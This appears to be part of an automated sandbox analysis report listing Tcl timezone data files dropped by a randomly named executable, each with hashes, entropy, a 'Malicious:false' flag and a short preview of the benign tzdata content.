                                                                                                                                                                                                                              SHA-256:D22C87321373EC0EFB0F312925476CD0747323EF303E17621A871BF814C8ABB1
                                                                                                                                                                                                                              SHA-512:EC4B4BE74C1BA64DEC8EF11DAAA338C52BD67D55E8A2352FBC6C83FA142F8DBE424CC1110E9A9D9A891E1E858D1FFA6D1E3B997D41BBB374556FA1F9A708559E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-6) {.. {-9223372036854775808 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.928999319005163
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIpdNMXGm2OHAXUVSYovV:SlSWB9eg/yRURDm2OHAXUVSYyV
                                                                                                                                                                                                                              MD5:56D88B54CA33B43E2E7D3EA6AD3A4D6E
                                                                                                                                                                                                                              SHA1:9351E0C001C5D83325281AF54363D76D65548B7D
                                                                                                                                                                                                                              SHA-256:70CB3A766A2E84148B68613D68687D263D3592ED4B6E672797FB20801ECA8231
                                                                                                                                                                                                                              SHA-512:32B58AD16F64590903C7AB49BA4890DAF6F1F3D33187A7654D3DA88A1C0047483EAA58B2498D824A30116E235FCC8F8FB3FADD57F86396240E5D92B2CA337027
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-7) {.. {-9223372036854775808 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.9145396982864895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIlSMXGm2OHN/VsdYLyn:SlSWB9eg/yRUlSDm2OHUp
                                                                                                                                                                                                                              MD5:E462AD5E0C046EA6769EDB4B2C80F4D4
                                                                                                                                                                                                                              SHA1:6DDB94485648622875E0927BA1E8CFE67CEC1382
                                                                                                                                                                                                                              SHA-256:80C85D59416CEC91DB3DAC5FDD2FD7B91D6FC74A37BBBEF6FF58F6F6816E8FC9
                                                                                                                                                                                                                              SHA-512:42734FD2DA8BD6E0BC271FF1375A31DEB72EED85AB5EA6E1E0F81EE4E3E7E74380FFC98FAC30409684F736DB580AAAF4F62DB4757AA35C10383584F6144EF363
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-8) {.. {-9223372036854775808 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.956751740978211
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIeyXMXGm2OHENScFAy:SlSWB9eg/yRUPDm2OHsScr
                                                                                                                                                                                                                              MD5:98F70EC1B1AC7D38CB8D01705FB0CA56
                                                                                                                                                                                                                              SHA1:EDAFA132E48935ACEB8E72D3FF463E4FC857C1A9
                                                                                                                                                                                                                              SHA-256:57395BB968AFA5A041EADA4B684B82F0379A9333F9522D69F069A79FDEA2B8D7
                                                                                                                                                                                                                              SHA-512:97B8D7603D6B54C075B005B905B2A7A28B8BEA67894F055663C44D2BF730BB937AC8EF5B2DF182BDD2D9EFFDBD135DF9467C813AEE39AA6B34256908A12DC011
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-9) {.. {-9223372036854775808 32400 0 +09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                                              Entropy (8bit):4.886484135647838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDVMFHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRC1p8RQy
                                                                                                                                                                                                                              MD5:F879FB24EA976394B8F4FAF1A9BF268C
                                                                                                                                                                                                                              SHA1:903714237EBD395A27EAF00B3DAAA89131267EE5
                                                                                                                                                                                                                              SHA-256:AB742F93BE44BD68AB8FE84505FA28120F1808765D9BAED32A3490AF7C83D35B
                                                                                                                                                                                                                              SHA-512:F5EE4C331E37036516F2A1BF12F2E088B2E2C7F6475127BF4E7B4937F864550D64D570BC855B6058D4311755E8696EC42095A36AEF13BB29E62192EE0AFB6EAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):163
                                                                                                                                                                                                                              Entropy (8bit):4.911342539638601
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRp+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRp6BURQy
                                                                                                                                                                                                                              MD5:CDD2DE9CF0FECFEA0CDD32DAC32DCDE2
                                                                                                                                                                                                                              SHA1:311CD4C6E819E18BAAACC382F81359BC208E2F73
                                                                                                                                                                                                                              SHA-256:F89167B6117838D9679C0397496B6D96D3A7BEAEF0BD99406ABACDBDB658FBCC
                                                                                                                                                                                                                              SHA-512:1AF061D07D2F579A089905B6B259AABD7C58F4FA0CD379EE54206164F0DCAEA5C720FB1F5E76F5782F8613E62D8F83BD55F1848D5D7A73D4A5C9F7BC6B9F5DB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):157
                                                                                                                                                                                                                              Entropy (8bit):4.838936002050477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRKh8RFB:SlSWB9vsM3yzTHAIgm6N/yR68RX
                                                                                                                                                                                                                              MD5:0587EB7D1B1C684A4A0F90D3CB0959C8
                                                                                                                                                                                                                              SHA1:3F2840AE512774494D9A0B6357C52CCB7DBA5265
                                                                                                                                                                                                                              SHA-256:0856D14DBBC53D46460BCD530BD070E9E8966D1C96BA01BA556E215A98C09CD4
                                                                                                                                                                                                                              SHA-512:DE38EF28893853219AC24AE4A522307ADAA1502F6D0C129219FAD9D75CFCE03A505C3E0758CFF2D2D4F7101414A5F7E4FC1C1B119B667E6A9C89B60DDA641E86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                              Entropy (8bit):4.903699772785336
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRF3yFNMXGm2OHvL:SlSWB9eg/yR9SDm2OHj
                                                                                                                                                                                                                              MD5:3D3F94B6AC5FA232E509356C703D9177
                                                                                                                                                                                                                              SHA1:502B8EE9D4A1EA75A91272181AC87B9B6ECE1F84
                                                                                                                                                                                                                              SHA-256:4D74D9EC2397B1708FEF47806294B0BCA26679F3A63149AE24E4E0C641976970
                                                                                                                                                                                                                              SHA-512:205A761A01C577F602236CB5C9938C834B7F3F9F681B94036B0A86101119893EF87D206D0C3F7737075ED833D4E35E374ACAE6605163E9C37B705D99BEBC928C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/UTC) {.. {-9223372036854775808 0 0 UTC}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):163
                                                                                                                                                                                                                              Entropy (8bit):4.874807282103623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRYzXDJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/yRY7VMr8RX
                                                                                                                                                                                                                              MD5:65E28EFF342B625E79175793FD38F9FD
                                                                                                                                                                                                                              SHA1:08B11474822E670DEAB8F0EA168BAED7D5E3DBE1
                                                                                                                                                                                                                              SHA-256:A2B62C5914DE169A68A018A5B47C1253DBCA10A251862D17B0781ECFD19B6192
                                                                                                                                                                                                                              SHA-512:79641D0E05F81BFB80034937D34E74B7483A790F33C1F9A0FA92C6A7913AC8C03036CFDEFB43850B84EFB3DD3C4A39022DC8F22E5B5DE6353586A546E03A5789
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                                              Entropy (8bit):4.874356623237119
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRaQEBURFB:SlSWB9vsM3yzTHAIgm6N/yRYaRX
                                                                                                                                                                                                                              MD5:EDABCAC858EC9632D5D8DCCFB28F4D6E
                                                                                                                                                                                                                              SHA1:E5BEF1367A97A1900749CE6B1E01CF32F582BDD9
                                                                                                                                                                                                                              SHA-256:BBD6E93206FF3B7017AFBE63905B4C932C422B582F3CE2A79A7B885D390EE555
                                                                                                                                                                                                                              SHA-512:3A22364D423F2F970123561408018A2B72F43C4978836D3B6DF7517217445605838DCB8DDBDA204FD01C49A4A7D5ADAD4CA8BDA7C3B412D54750BAEAA589B683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.892809684252761
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQaiFAXowQahCv:SlSWB9vsM3ymhS2HAIgoh26N/ywAXoww
                                                                                                                                                                                                                              MD5:B0B409D665190569A56697799FBA5CD3
                                                                                                                                                                                                                              SHA1:840AA7D61E64ACE61FDDAB96F716575A61CEDB52
                                                                                                                                                                                                                              SHA-256:46141E7BC0F99D2117319C661569F8B38AF7D00108CED5784FA3A3B5090EF8E9
                                                                                                                                                                                                                              SHA-512:D7C0588D98AC46B5191D7C7E8F5181E94306EFFCC9E3F2DBA9E0003BAE51D992334527ADDD6D0C9701CFD60169A74984B3401E7A6A1322A734BC3D90DCC933BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Amsterdam) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6927
                                                                                                                                                                                                                              Entropy (8bit):3.8182041031531897
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CA34elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:CI41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:D897DCA686A03495EB2C3323FAB0BEAD
                                                                                                                                                                                                                              SHA1:1433BC303DE92F7B36F881C8595A42B35E0814FC
                                                                                                                                                                                                                              SHA-256:F0B48DA7CA3659450D87CC0DDFDDFD28B464543DF1EE40D935C44D5CD7C9B9B3
                                                                                                                                                                                                                              SHA-512:A1C4AE1E0EC26B159B0F5D058A7A77B8774F611A4D3C6AECEDD7186957D6BD9F15CDFCBA248FCC8A4B4146BD72CD7D66B9F88A2BF7CDEF416F1831A2F335D48C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Andorra) {.. {-9223372036854775808 364 0 LMT}.. {-2177453164 0 0 WET}.. {-733881600 3600 0 CET}.. {481078800 7200 0 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0 CET}.. {733280400 7200 1 CEST}.. {749005200 3600 0 CET}.. {764730000 7200 1 CEST}.. {780454800 3600 0 CET}.. {796179600 7200 1 CEST}.. {811904400 3600 0 CET}.. {828234000 7200 1 CEST}.. {846378000 3600 0 CET}.. {859683600 7200 1 CEST}.. {877827600 3600 0 CET}.. {891133200 7200 1 CEST}.. {909277200 3600 0 CET}.. {922582800 7200 1 CEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.679377249443024
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:TvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDOP:rCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                              MD5:CB860328FA96A14055BF51A3B2D35A08
                                                                                                                                                                                                                              SHA1:CFA49DC861F4AC3D29A78D63D71C2D6D83D68F84
                                                                                                                                                                                                                              SHA-256:4B5FB0AF225974D117374028285F20A02B833FF4136E6BFAE7B65E6D6D28829E
                                                                                                                                                                                                                              SHA-512:960152826F4245012462E53F80B69B0C45C27D75D46C70D485674CA19071DF268671C7691B614BE53B9E7BD8CFEC5D24F3DCF933F2F14D827F2A32EB347D7540
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Astrakhan) {.. {-9223372036854775808 11532 0 LMT}.. {-1441249932 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7954
                                                                                                                                                                                                                              Entropy (8bit):3.7252594544513795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:1D/8QdzFu+f+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:Z/8ohvyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:8B2C99E1CD04D7559709FDF8D382343C
                                                                                                                                                                                                                              SHA1:C595D5159C742B815AF89EC8604376E01291F9F1
                                                                                                                                                                                                                              SHA-256:47353319419505AAB205C23F8C97EA0B12E5DED2113147794F77B67349AFF52F
                                                                                                                                                                                                                              SHA-512:227CA21A3B6160357988582E261A62AE7B09D46D479EABFAC8039185D710EFA765CD1694F4388EBF8800978A1E1DB69F6AF9BB9BF82C0FCD66E883930E1F8249
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Athens) {.. {-9223372036854775808 5692 0 LMT}.. {-2344642492 5692 0 AMT}.. {-1686101632 7200 0 EET}.. {-1182996000 10800 1 EEST}.. {-1178161200 7200 0 EET}.. {-906861600 10800 1 EEST}.. {-904878000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844477200 7200 1 CEST}.. {-828237600 3600 0 CET}.. {-812422800 7200 0 EET}.. {-552362400 10800 1 EEST}.. {-541652400 7200 0 EET}.. {166485600 10800 1 EEST}.. {186184800 7200 0 EET}.. {198028800 10800 1 EEST}.. {213753600 7200 0 EET}.. {228873600 10800 1 EEST}.. {244080000 7200 0 EET}.. {260323200 10800 1 EEST}.. {275446800 7200 0 EET}.. {291798000 10800 1 EEST}.. {307407600 7200 0 EET}.. {323388000 10800 1 EEST}.. {338936400 7200 0 EET}.. {347148000 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.876296755647751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQahs3QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/y72
                                                                                                                                                                                                                              MD5:7160C6EE32380846653F016AE8AFD52A
                                                                                                                                                                                                                              SHA1:DE7805089639C54893F2107FA67342DA72A79BBC
                                                                                                                                                                                                                              SHA-256:557023674F6E8376707517103EE69C1DEBBE53CDD4BCAB11E763CC53B9CB1908
                                                                                                                                                                                                                              SHA-512:FDBDECBBDB0C419226E2604608FD2923CFB06E4B6948493208FD83FD796880E81F6147C0FAFEB572079C9C916831B7B055620EC939164CCA1DAF76897BE60F2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Belfast) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7309
                                                                                                                                                                                                                              Entropy (8bit):3.8204712502914653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lp+/4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:lY41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:02A003411B61A311896A6407B622152A
                                                                                                                                                                                                                              SHA1:3B8BC6D1AF698CE7BB14A08307F5A4295EB8ED03
                                                                                                                                                                                                                              SHA-256:74B225511B518B0CED972CBB33D694697712CCB96A6D81E0F50ADA28CF6E2C92
                                                                                                                                                                                                                              SHA-512:9E03B3EB1E528E5B1ADBA09F808E73BF9C4314EDCBF6F96E46844D51A5F425BED3EE8FD5BA8706C46A7FB9882485F119F81996F2EAB7E1E9B598978C402DDE0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Belgrade) {.. {-9223372036854775808 4920 0 LMT}.. {-2713915320 3600 0 CET}.. {-905824800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-777942000 7200 1 CEST}.. {-766623600 3600 0 CET}.. {407199600 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 360
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8020
                                                                                                                                                                                                                              Entropy (8bit):3.820756136386754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Pi9+qFR274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:PQs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:84027C3C8315BD479B38DE11F38E873F
                                                                                                                                                                                                                              SHA1:6E92A2A9734A9C6B02ECCD99F114D667C909C5BA
                                                                                                                                                                                                                              SHA-256:7E7111F06288069B52A4E1CA0B016216DF9328FB3B1560A740146497CCDD4D24
                                                                                                                                                                                                                              SHA-512:5FFDE523021FC0C490261F55999204C9CE6C8C274888525EA6EE7C01BC5CCABC7A3877FD454B4167D81F4B89BACB087E8BA6AB0BAC46C2874ED9257BE2092340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Berlin) {.. {-9223372036854775808 3208 0 LMT}.. {-2422054408 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-776559600 10800 0 CEMT}.. {-765936000 7200 1 CEST}.. {-761180400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717631200 7200 1 CEST}.. {-714610800 10800 1 CEMT}.. {-710380800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {315529200 3600 0 CET}.. {323830800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.943205109348136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtXrAeovXHAIgoquXrsY6RL/yQahcvEB5yQazXrH:SlSWB9vsM3ymzbAeSHAIgozbsY6N/y7c
                                                                                                                                                                                                                              MD5:C69AB60BE74D4BB7E31BE4E5ECCD8FD2
                                                                                                                                                                                                                              SHA1:9DD0BA6171080F074858EF88ADA2E91C1F465619
                                                                                                                                                                                                                              SHA-256:1D7C539AAA1E3AD5EF3574A629523B5B781F1A91D352C9B39B8DE7316756026E
                                                                                                                                                                                                                              SHA-512:C273B97CCFB5F328EB7A13CCA3126DE8D91B3876CBD248990C0BE063DDBE5B0F31EA138E31A1C5C43B1ABCF42EA511448E6DC589EB99E8172D7C2A68BA31A8E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Prague)]} {.. LoadTimeZoneFile Europe/Prague..}..set TZData(:Europe/Bratislava) $TZData(:Europe/Prague)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9223
                                                                                                                                                                                                                              Entropy (8bit):3.8450929464870804
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RhcSQnG1Czyc1+FdDKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcM:Rh8zyc4Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:E6C1153C3F71C8C005D7A46DDF6461FB
                                                                                                                                                                                                                              SHA1:CBDF7D5D36AF57D83859C910B493464617EC9571
